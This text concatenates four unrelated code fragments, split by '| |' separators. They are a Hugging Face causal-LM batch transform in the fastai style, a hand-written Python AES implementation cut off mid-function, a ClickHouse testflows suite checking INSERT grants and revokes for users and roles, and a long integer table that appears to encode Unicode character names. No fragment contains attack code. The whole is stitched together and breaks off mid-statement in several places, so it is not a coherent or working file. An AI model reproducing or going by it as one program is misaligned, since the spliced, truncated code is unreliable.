hf_model: PreTrainedModel,
# To control whether the "labels" are included in your inputs. If they are, the loss will be calculated in
# the model's forward function and you can simply use `PreCalculatedLoss` as your `Learner`'s loss function to use it
include_labels: bool = True,
# The token ID that should be ignored when calculating the loss
ignore_token_id: int = CrossEntropyLossFlat().ignore_index,
# The language modeling strategy (or objective)
lm_strategy_cls: BaseLMStrategy = CausalLMStrategy,
# To control the length of the padding/truncation. It can be an integer or None,
# in which case it will default to the maximum length the model can accept. If the model has no
# specific maximum input length, truncation/padding to max_length is deactivated.
# See [Everything you always wanted to know about padding and truncation](https://huggingface.co/transformers/preprocessing.html#everything-you-always-wanted-to-know-about-padding-and-truncation)
max_length: int = None,
# To control the `padding` applied to your `hf_tokenizer` during tokenization. If None, will default to
# `False` or `'do_not_pad'.
# See [Everything you always wanted to know about padding and truncation](https://huggingface.co/transformers/preprocessing.html#everything-you-always-wanted-to-know-about-padding-and-truncation)
padding: Union[bool, str] = True,
# To control `truncation` applied to your `hf_tokenizer` during tokenization. If None, will default to
# `False` or `do_not_truncate`.
# See [Everything you always wanted to know about padding and truncation](https://huggingface.co/transformers/preprocessing.html#everything-you-always-wanted-to-know-about-padding-and-truncation)
truncation: Union[bool, str] = True,
# The `is_split_into_words` argument applied to your `hf_tokenizer` during tokenization. Set this to `True`
# if your inputs are pre-tokenized (not numericalized)
is_split_into_words: bool = False,
# Any other keyword arguments you want included when using your `hf_tokenizer` to tokenize your inputs
tok_kwargs={},
# Any keyword arguments you want included when generated text
# See [How to generate text](https://huggingface.co/blog/how-to-generate)
text_gen_kwargs={},
# Keyword arguments to apply to `BatchTokenizeTransform`
**kwargs
):
super().__init__(
hf_arch,
hf_config,
hf_tokenizer,
hf_model,
include_labels=include_labels,
ignore_token_id=ignore_token_id,
max_length=max_length,
padding=padding,
truncation=truncation,
is_split_into_words=is_split_into_words,
tok_kwargs=tok_kwargs.copy(),
**kwargs
)
self.lm_strategy = lm_strategy_cls(hf_tokenizer=hf_tokenizer, ignore_token_id=ignore_token_id)
self.text_gen_kwargs, self.ignore_token_id = text_gen_kwargs, ignore_token_id
def encodes(self, samples, return_batch_encoding=False):
# because no target is specific in CLM, fastai will duplicate the inputs (which is just the raw text)
samples, inputs = super().encodes(samples, return_batch_encoding=True)
if len(samples[0]) == 1:
return samples
updated_samples = self.lm_strategy.build_inputs_targets(samples, self.include_labels, inputs)
if return_batch_encoding:
return updated_samples, inputs
return updated_samples
# Cell
@typedispatch
def show_batch(
# This typedispatched `show_batch` will be called for `CausalLMTextInput` typed inputs
x: CausalLMTextInput,
# Your targets
y,
# Your raw inputs/targets
samples,
# Your `DataLoaders`. This is required so as to get at the Hugging Face objects for
# decoding them into something understandable
dataloaders,
# Your `show_batch` context
ctxs=None,
# The maximum number of items to show
max_n=6,
# Any truncation your want applied to your decoded inputs
trunc_at=None,
# Any other keyword arguments you want applied to `show_batch`
**kwargs
):
# grab our tokenizer and ignore token to decode
tfm = first_blurr_tfm(dataloaders)
hf_tokenizer = tfm.hf_tokenizer
ignore_token_id = tfm.ignore_token_id
res | |
from typing import List, Union, Tuple, Any, Generator
from itertools import chain
import warnings
import os
ECB = 1
CBC = 2
S_box = [
[0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76],
[0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0],
[0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15],
[0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75],
[0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84],
[0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf],
[0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8],
[0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2],
[0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73],
[0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb],
[0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79],
[0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08],
[0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a],
[0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e],
[0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf],
[0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]
]
Inv_S_box = [
[0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb],
[0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb],
[0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e],
[0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25],
[0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92],
[0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84],
[0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06],
[0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b],
[0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73],
[0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e],
[0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b],
[0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4],
[0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f],
[0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef],
[0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61],
[0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d],
]
Rcon = (
0x01, 0x02, 0x04, 0x08, 0x10, 0x20,
0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,
0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc,
0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4,
0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91,
)
def xtime(a): return (((a << 1) ^ 0x1B) & 0xFF) if (a & 0x80) else (a << 1)
def _split(a: List[bytes], n: int) -> List[List[bytes]]:
"""
Splits a list into a list of n sub-lists. Assumes that len(a) % n == 0
:param a: the list to split
:param n: number of parts to split the list into
:return: a list containing the parts of the source list
"""
k, m = divmod(len(a), n)
return list(a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(n))
def _chunk(l: List[Any], n: int) -> Generator:
"""
Chunks the provided list into sub-lists, each containing n items. Assumes that len(l) % n == 0
:param l: the list to chunk
:param n: number of elements in each chunk
"""
for i in range(0, len(l), n):
yield l[i:i + n]
def _g(block: List[int], rc: bytes) -> List[bytes]:
"""
Performs the confusion step when expanding the key to roundkeys
:param block: the block to operate on
:param rc: the rcon value to use
:return: the transformed block
"""
block = [__sub_byte(b, S_box) for b in block[1:] + [block[0]]]
return [block[0] ^ rc] + block[1:]
def __sub_byte(b: int, box: List[List[bytes]]) -> bytes:
"""
Performs the substitution from one byte to another from the provided S-box
:param b: the byte to substitute
:param box: the box to pick substitution values from
:return: the substituted byte
"""
b = hex(b)[2:]
if len(b) == 1:
b = '0' + b
row, col = list(b)
return box[int(row, 16)][int(col, 16)]
def _sub_bytes(state, box):
new_mat = []
for row in state:
new_row = []
for v in row:
new_row.append(__sub_byte(v, box))
new_mat.append(new_row)
return new_mat
def _shift_rows(s: List[List[bytes]]) -> List[List[bytes]]:
"""
Performs the shift rows transformation as described in the standard
:param s: the state matrix
:return: the new state matrix with shifted rows
"""
s[0][1], s[1][1], s[2][1], s[3][1] = s[1][1], s[2][1], s[3][1], s[0][1]
s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]
s[0][3], s[1][3], s[2][3], s[3][3] = s[3][3], s[0][3], s[1][3], s[2][3]
return s
def _inv_shift_rows(s: List[List[bytes]]) -> List[List[bytes]]:
"""
Performs the inverted shift rows transformation as described in the standard
:param s: the state matrix
:return: the new state matrix with shifted rows
"""
s[0][1], s[1][1], s[2][1], s[3][1] = s[3][1], s[0][1], s[1][1], s[2][1]
s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]
s[0][3], s[1][3], s[2][3], s[3][3] = s[1][3], s[2][3], s[3][3], s[0][3]
return s
def _round(state: List[List[bytes]], round_key: List[Union[List[List[int]], List[list]]]) -> List[List[int]]:
"""
Performs a complete round over a block using the provided roundkey
:param state: the state matrix before the round transformations
:param round_key: the round key to use for this round
:return: state matrix after the round transformations have been applied
"""
state = _sub_bytes(state, S_box)
state = _shift_rows(state)
state = _mix_columns(state)
state = _add_round_key(state, round_key)
return state
def _inv_round(state: List[List[bytes]], round_key: List[Union[List[List[int]], List[list]]]) -> List[List[int]]:
"""
Performs a complete inverse round over a block using the provided roundkey
:param state: the state matrix before the inverse round transformations
:param round_key: the round key to use for this round
:return: state matrix after the inverse round transformations have been applied
"""
state = _inv_shift_rows(state)
state = _sub_bytes(state, Inv_S_box)
state = _add_round_key(state, round_key)
state = _inv_mix_columns(state)
return state
def __mix_column(col: List[bytes]) -> List[bytes]:
"""
Mixes a single column
:param state: The column to mix
:return: The mixed column
"""
t = col[0] ^ col[1] ^ col[2] ^ col[3]
u = col[0]
col[0] ^= t ^ xtime(col[0] ^ col[1])
col[1] ^= t ^ xtime(col[1] ^ col[2])
col[2] ^= t ^ xtime(col[2] ^ col[3])
col[3] ^= t ^ xtime(col[3] ^ u)
return col
def _mix_columns(state: List[List[bytes]]) -> list:
"""
Performs the mix column transformation as described by the standard.
:param state: The current state
:return: The state with mixed columns
"""
return [__mix_column(column) for column in state]
def _inv_mix_columns(state: List[List[bytes]]) -> list:
"""
Performs the inverse mix column transformation as described by the standard.
:param state: The current state
:return: The state with mixed columns
"""
for s in state:
u = xtime(xtime(s[0] ^ s[2]))
v = xtime(xtime(s[1] ^ s[3]))
s[0] ^= u
s[1] ^= v
s[2] ^= u
s[3] ^= v
return _mix_columns(state)
def _add_round_key(state: List[List[bytes]], round_key: List[Union[List[List[int]], List[list]]]) -> list:
"""
Applies the current round key to the state matrix.
:param state: the current state matrix
:param round_key: the current round key
:return: the new state after the round key has been applied
"""
| |
from contextlib import contextmanager
import json
from testflows.core import *
from testflows.asserts import error
from rbac.requirements import *
import rbac.tests.errors as errors
table_types = {
"MergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = MergeTree(d, (a, b), 111)",
"ReplacingMergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = ReplacingMergeTree(d, (a, b), 111)",
"SummingMergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = SummingMergeTree(d, (a, b), 111)",
"AggregatingMergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = AggregatingMergeTree(d, (a, b), 111)",
"CollapsingMergeTree": "CREATE TABLE {name} (d Date, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = CollapsingMergeTree(d, (a, b), 111, y);",
"VersionedCollapsingMergeTree": "CREATE TABLE {name} (d Date, a String, b UInt8, x String, y Int8, z UInt32, version UInt64, sign Int8, INDEX a (b * y, d) TYPE minmax GRANULARITY 3) ENGINE = VersionedCollapsingMergeTree(sign, version) ORDER BY tuple()",
"GraphiteMergeTree": "CREATE TABLE {name} (key UInt32, Path String, Time DateTime, d Date, a String, b UInt8, x String, y Int8, z UInt32, Value Float64, Version UInt32, col UInt64, INDEX a (key * Value, Time) TYPE minmax GRANULARITY 3) ENGINE = GraphiteMergeTree('graphite_rollup_example') ORDER BY tuple()"
}
table_requirements ={
"MergeTree": RQ_SRS_006_RBAC_Privileges_Insert_MergeTree("1.0"),
"ReplacingMergeTree": RQ_SRS_006_RBAC_Privileges_Insert_ReplacingMergeTree("1.0"),
"SummingMergeTree": RQ_SRS_006_RBAC_Privileges_Insert_SummingMergeTree("1.0"),
"AggregatingMergeTree": RQ_SRS_006_RBAC_Privileges_Insert_AggregatingMergeTree("1.0"),
"CollapsingMergeTree": RQ_SRS_006_RBAC_Privileges_Insert_CollapsingMergeTree("1.0"),
"VersionedCollapsingMergeTree": RQ_SRS_006_RBAC_Privileges_Insert_VersionedCollapsingMergeTree("1.0"),
"GraphiteMergeTree": RQ_SRS_006_RBAC_Privileges_Insert_GraphiteMergeTree("1.0"),
}
@contextmanager
def table(node, name, table_type="MergeTree"):
try:
with Given(f"I have a {table_type} table"):
node.query(table_types[table_type].format(name=name))
yield
finally:
with Finally("I drop the table"):
node.query(f"DROP TABLE IF EXISTS {name}")
@contextmanager
def user(node, name):
try:
names = name.split(",")
for i in names:
with Given("I have a user"):
node.query(f"CREATE USER OR REPLACE {i}")
yield
finally:
for i in names:
with Finally("I drop the user"):
node.query(f"DROP USER IF EXISTS {name}")
@contextmanager
def role(node, role):
try:
roles = role.split(",")
for j in roles:
with Given("I have a role"):
node.query(f"CREATE ROLE OR REPLACE {j}")
yield
finally:
for j in roles:
with Finally("I drop the role"):
node.query(f"DROP ROLE IF EXISTS {role}")
def input_output_equality_check(node, input_columns, input_data):
data_list = [x.strip("'") for x in input_data.split(",")]
input_dict = dict(list(zip(input_columns.split(","), data_list)))
output_dict = json.loads(node.query(f"select {input_columns} from merge_tree format JSONEachRow").output)
output_dict = {k:str(v) for (k,v) in list(output_dict.items())}
return input_dict == output_dict
@TestScenario
def without_privilege(self, table_type, node=None):
"""Check that user without insert privilege on a table is not able to insert on that table.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"):
with When("I run INSERT without privilege"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')", settings = [("user","user0")],
exitcode=exitcode, message=message)
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Insert_Grant("1.0"),
)
def user_with_privilege(self, table_type, node=None):
"""Check that user can insert into a table on which they have insert privilege and the inserted data is correct.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"):
with When("I grant privilege"):
node.query("GRANT INSERT ON merge_tree TO user0")
with And("I use INSERT"):
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')", settings=[("user","user0")])
with Then("I check the insert functioned"):
output = node.query("SELECT d FROM merge_tree FORMAT JSONEachRow").output
assert output == '{"d":"2020-01-01"}', error()
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Insert_Revoke("1.0"),
)
def user_with_revoked_privilege(self, table_type, node=None):
"""Check that user is unable to insert into a table after insert privilege on that table has been revoked from user.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"):
with When("I grant privilege"):
node.query("GRANT INSERT ON merge_tree TO user0")
with And("I revoke privilege"):
node.query("REVOKE INSERT ON merge_tree FROM user0")
with And("I use INSERT"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')",
settings=[("user","user0")], exitcode=exitcode, message=message)
@TestScenario
def user_with_privilege_on_columns(self, table_type):
Scenario(run=user_column_privileges,
examples=Examples("grant_columns revoke_columns insert_columns_fail insert_columns_pass data_fail data_pass table_type",
[tuple(list(row)+[table_type]) for row in user_column_privileges.examples]))
@TestOutline(Scenario)
@Requirements(
RQ_SRS_006_RBAC_Privileges_Insert_Column("1.0"),
)
@Examples("grant_columns revoke_columns insert_columns_fail insert_columns_pass data_fail data_pass", [
("d", "d", "x", "d", '\'woo\'', '\'2020-01-01\''),
("d,a", "d", "x", "d", '\'woo\'', '\'2020-01-01\''),
("d,a,b", "d,a,b", "x", "d,b", '\'woo\'', '\'2020-01-01\',9'),
("d,a,b", "b", "y", "d,a,b", '9', '\'2020-01-01\',\'woo\',9')
])
def user_column_privileges(self, grant_columns, insert_columns_pass, data_fail, data_pass, table_type,
revoke_columns=None, insert_columns_fail=None, node=None):
"""Check that user is able to insert on granted columns
and unable to insert on not granted or revoked columns.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"):
with When("I grant insert privilege"):
node.query(f"GRANT INSERT({grant_columns}) ON merge_tree TO user0")
if insert_columns_fail is not None:
with And("I insert into not granted column"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query(f"INSERT INTO merge_tree ({insert_columns_fail}) VALUES ({data_fail})",
settings=[("user","user0")], exitcode=exitcode, message=message)
with And("I insert into granted column"):
node.query(f"INSERT INTO merge_tree ({insert_columns_pass}) VALUES ({data_pass})",
settings=[("user","user0")])
with Then("I check the insert functioned"):
input_equals_output = input_output_equality_check(node, insert_columns_pass, data_pass)
assert input_equals_output, error()
if revoke_columns is not None:
with When("I revoke insert privilege from columns"):
node.query(f"REVOKE INSERT({revoke_columns}) ON merge_tree FROM user0")
with And("I insert into revoked columns"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query(f"INSERT INTO merge_tree ({insert_columns_pass}) VALUES ({data_pass})",
settings=[("user","user0")], exitcode=exitcode, message=message)
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Insert_Grant("1.0"),
)
def role_with_privilege(self, table_type, node=None):
"""Check that user can insert into a table after it is granted a role that
has the insert privilege for that table.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"), role(node, "role0"):
with When("I grant insert privilege to a role"):
node.query("GRANT INSERT ON merge_tree TO role0")
with And("I grant role to the user"):
node.query("GRANT role0 TO user0")
with And("I insert into a table"):
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')", settings=[("user","user0")])
with Then("I check that I can read inserted data"):
output = node.query("SELECT d FROM merge_tree FORMAT JSONEachRow").output
assert output == '{"d":"2020-01-01"}', error()
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Insert_Revoke("1.0"),
)
def role_with_revoked_privilege(self, table_type, node=None):
"""Check that user with a role that has insert privilege on a table
is unable to insert into that table after insert privilege
has been revoked from the role.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"), role(node, "role0"):
with When("I grant privilege to a role"):
node.query("GRANT INSERT ON merge_tree TO role0")
with And("I grant the role to a user"):
node.query("GRANT role0 TO user0")
with And("I revoke privilege from the role"):
node.query("REVOKE INSERT ON merge_tree FROM role0")
with And("I insert into the table"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')",
settings=[("user","user0")], exitcode=exitcode, message=message)
@TestScenario
def user_with_revoked_role(self, table_type, node=None):
"""Check that user with a role that has insert privilege on a table
is unable to insert into that table after the role with insert
privilege has been revoked from the user.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"), role(node, "role0"):
with When("I grant privilege to a role"):
node.query("GRANT INSERT ON merge_tree TO role0")
with And("I grant the role to a user"):
node.query("GRANT role0 TO user0")
with And("I revoke the role from the user"):
node.query("REVOKE role0 FROM user0")
with And("I insert into the table"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')",
settings=[("user","user0")], exitcode=exitcode, message=message)
@TestScenario
def role_with_privilege_on_columns(self, table_type):
Scenario(run=role_column_privileges,
examples=Examples("grant_columns revoke_columns insert_columns_fail insert_columns_pass data_fail data_pass table_type",
[tuple(list(row)+[table_type]) for row in role_column_privileges.examples]))
@TestOutline(Scenario)
@Requirements(
RQ_SRS_006_RBAC_Privileges_Insert_Column("1.0"),
)
@Examples("grant_columns revoke_columns insert_columns_fail insert_columns_pass data_fail data_pass", [
("d", "d", "x", "d", '\'woo\'', '\'2020-01-01\''),
("d,a", "d", "x", "d", '\'woo\'', '\'2020-01-01\''),
("d,a,b", "d,a,b", "x", "d,b", '\'woo\'', '\'2020-01-01\',9'),
("d,a,b", "b", "y", "d,a,b", '9', '\'2020-01-01\',\'woo\',9')
])
def role_column_privileges(self, grant_columns, insert_columns_pass, data_fail, data_pass,
table_type, revoke_columns=None, insert_columns_fail=None, node=None):
"""Check that user with a role is able to insert on granted columns and unable
to insert on not granted or revoked columns.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"), role(node, "role0"):
with When("I grant insert privilege"):
node.query(f"GRANT INSERT({grant_columns}) ON merge_tree TO role0")
with And("I grant the role to a user"):
node.query("GRANT role0 TO user0")
if insert_columns_fail is not None:
with And("I insert into not granted column"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query(f"INSERT INTO merge_tree ({insert_columns_fail}) VALUES ({data_fail})",
settings=[("user","user0")], exitcode=exitcode, message=message)
with And("I insert into granted column"):
node.query(f"INSERT INTO merge_tree ({insert_columns_pass}) VALUES ({data_pass})",
settings=[("user","user0")])
with Then("I check the insert functioned"):
input_equals_output = input_output_equality_check(node, insert_columns_pass, data_pass)
assert input_equals_output, error()
if revoke_columns is not None:
with When("I revoke insert privilege from columns"):
node.query(f"REVOKE INSERT({revoke_columns}) ON merge_tree FROM role0")
with And("I insert into revoked columns"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query(f"INSERT INTO merge_tree ({insert_columns_pass}) VALUES ({data_pass})",
settings=[("user","user0")], exitcode=exitcode, | |
128381,
-1,
921391730,
11241,
-51474,
921338757,
128493,
-1,
921506790,
128495,
921763839,
920848413,
-1,
921777907,
921645917,
-1,
-51470,
921711866,
129308,
-1,
921769380,
1421,
-51468,
921732440,
8295,
-51467,
921922639,
128270,
-1,
921975812,
9957,
922171140,
917248280,
127872,
922288127,
922091644,
-1,
922302203,
922192781,
-1,
-51462,
922252107,
11187,
-1,
922308539,
11186,
922498814,
922252113,
-1,
-51459,
922454922,
11189,
-1,
922495446,
11191,
922695425,
922439616,
-1,
-51456,
922651530,
11188,
-1,
922692054,
11190,
922943487,
922626523,
-1,
-51453,
922841931,
11185,
-1,
922898363,
11184,
923088646,
922115408,
128141,
-1,
923026691,
128365,
923219721,
923016897,
-1,
-51448,
923149243,
127832,
-1,
923211943,
127833,
-1,
923153734,
129350,
923481926,
917187423,
-1,
923547430,
923417014,
-1,
-51443,
923506808,
127487,
-51442,
923571885,
127486,
-51441,
923637234,
127485,
-51440,
923701529,
127484,
-51439,
923766325,
127483,
-51438,
923830423,
127482,
-51437,
923894094,
127481,
-51436,
923957282,
127480,
-51435,
924020556,
127479,
-51434,
924085805,
127478,
-51433,
924149969,
127477,
-51432,
924213349,
127476,
-51431,
924277591,
127475,
-51430,
924341780,
127474,
-51429,
924404983,
127473,
-51428,
924469955,
127472,
-51427,
924535285,
127471,
-51426,
924598365,
127470,
-51425,
924662471,
127469,
-51424,
924727209,
127468,
-51423,
924791590,
127467,
-51422,
924855135,
127466,
-51421,
924919135,
127465,
-51420,
924982583,
127464,
-51419,
925046818,
127463,
-1,
925110033,
127462,
925316921,
923504181,
-1,
925382456,
925249796,
-1,
925447986,
925312353,
-1,
925513516,
925402171,
-1,
-51413,
925469669,
128402,
-1,
925510192,
128403,
925710127,
925462348,
-1,
-51410,
925647459,
11262,
-1,
925700509,
128401,
-51408,
925667332,
128404,
-51407,
925842403,
128405,
-1,
925901358,
11841,
926154751,
925368320,
-1,
926168886,
926044844,
-1,
-51403,
926112934,
983151,
-1,
926169427,
128968,
-51401,
926106707,
983152,
-1,
926293918,
128639,
-1,
925327911,
128158,
926562109,
925244727,
-1,
-51397,
926511420,
128665,
-51396,
926573937,
983112,
-1,
926625362,
129534,
926824256,
926517172,
-1,
-51393,
926774091,
11153,
-1,
926830523,
11152,
927020867,
926754145,
-1,
-51390,
926955938,
129511,
-1,
927012071,
127822,
-51388,
926974075,
128699,
-51387,
927160778,
127895,
-1,
927224555,
128524,
927414115,
923426917,
-1,
927479635,
927370040,
-1,
927545168,
927411446,
-1,
927610700,
927496840,
-1,
-51381,
927566166,
127588,
-1,
927622790,
127586,
-51379,
927569485,
127587,
-51378,
927749614,
127585,
-51377,
927807384,
127584,
-1,
927866232,
127589,
928120831,
927465472,
-1,
-51374,
928023139,
128907,
-1,
928083458,
128205,
928266073,
927421395,
-1,
928331607,
928197471,
-1,
-51370,
928280398,
127906,
-1,
928327132,
128478,
-51368,
928269676,
129315,
-1,
928449339,
129531,
928659292,
928219754,
-1,
-51365,
928617210,
11215,
-1,
928666420,
11213,
928855902,
928610683,
127801,
-1,
928810862,
127989,
-51361,
928813592,
128675,
-51360,
928933353,
128019,
-51359,
928981322,
128640,
-51358,
929045486,
129302,
-1,
929109683,
127840,
929314688,
927338257,
-1,
929380213,
929251421,
-1,
929445745,
929331628,
-1,
929511274,
929381299,
9995,
929628159,
929432964,
-1,
-51351,
929524230,
128406,
-1,
929576143,
128400,
929773421,
929453588,
-1,
-51348,
929703341,
127339,
-1,
929766723,
127338,
-51346,
929707258,
9994,
-51345,
929900679,
11827,
-51344,
929964590,
11828,
-1,
930027611,
129306,
930232180,
929388043,
-1,
-51341,
930186777,
128740,
-1,
930225734,
128643,
-1,
930176014,
127752,
930494330,
929307959,
-1,
930559865,
930432254,
-1,
-51336,
930503310,
127949,
-1,
930553414,
127950,
-1,
930489178,
129437,
930822012,
930424856,
128251,
-1,
930742538,
128280,
930953086,
930748691,
128007,
-1,
930873806,
128048,
-51329,
930906446,
128000,
-1,
931026452,
128015,
931215257,
929269911,
-1,
931280784,
931158871,
-1,
931346317,
931217733,
-1,
931411850,
931280649,
-1,
931477383,
931335953,
-1,
-51322,
931410227,
5880,
-1,
931470647,
5879,
-51320,
931423699,
5876,
-51319,
931612650,
5877,
-1,
931671507,
5878,
-51317,
931363464,
5874,
-51316,
931816531,
5875,
-1,
931875523,
5873,
932118527,
931289943,
-1,
-51313,
932005280,
127933,
-1,
932065397,
127939,
932263831,
931233526,
-1,
-51310,
932220973,
11251,
-51309,
932283972,
11256,
-51308,
932346319,
11255,
-51307,
932409155,
11253,
-51306,
932470573,
11252,
-1,
932518509,
11254,
-51304,
932198518,
127945,
-1,
932649757,
8381,
932853662,
931155191,
-1,
-51301,
932798565,
983226,
-51300,
932861460,
983221,
-51299,
932921437,
983231,
-1,
932981599,
983223,
-51297,
932804642,
983113,
-1,
933117509,
129423,
933312608,
917121887,
-1,
933378013,
933252343,
-1,
933443542,
933304564,
-1,
933509032,
933387095,
-1,
-51291,
933448258,
66837,
-51290,
933505887,
66835,
-51289,
933570224,
66821,
-1,
933629713,
66836,
933836718,
933443497,
